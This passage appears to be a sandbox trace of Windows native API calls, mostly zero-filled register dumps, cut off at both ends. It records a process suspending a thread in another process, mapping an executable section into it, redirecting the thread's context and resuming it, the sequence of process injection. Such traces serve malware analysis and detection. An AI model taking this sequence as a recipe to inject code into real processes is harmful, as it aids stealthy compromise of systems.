[266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.180] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.181] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x10f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x110000) returned 0x0 [0195.188] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x10f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x940000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x110000) returned 0x0 [0195.206] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.213] NtClose (Handle=0x10c) returned 0x0 [0195.214] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x17fc48, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x17fbf0, Eip=0x9bc707, SegCs=0x23, EFlags=0x246, Esp=0x17fbd4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.214] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.214] NtClose (Handle=0xbc) returned 0x0 [0195.214] NtClose (Handle=0x104) returned 0x0 [0195.215] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x894, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0195.215] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.215] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.215] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.216] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.222] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x898) | out: ThreadHandle=0x19ea68*=0xbc) returned 0x0 [0195.222] NtSuspendThread (in: ThreadHandle=0xbc, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.222] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2490000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.229] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x40fa60, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x40fa08, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x40f9ec, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.229] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.229] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x19f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x1a0000) returned 0x0 [0195.245] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x19f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0xcb0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x1a0000) returned 0x0 [0195.276] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.292] NtClose (Handle=0x10c) returned 0x0 [0195.292] NtSetContextThread (ThreadHandle=0xbc, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, 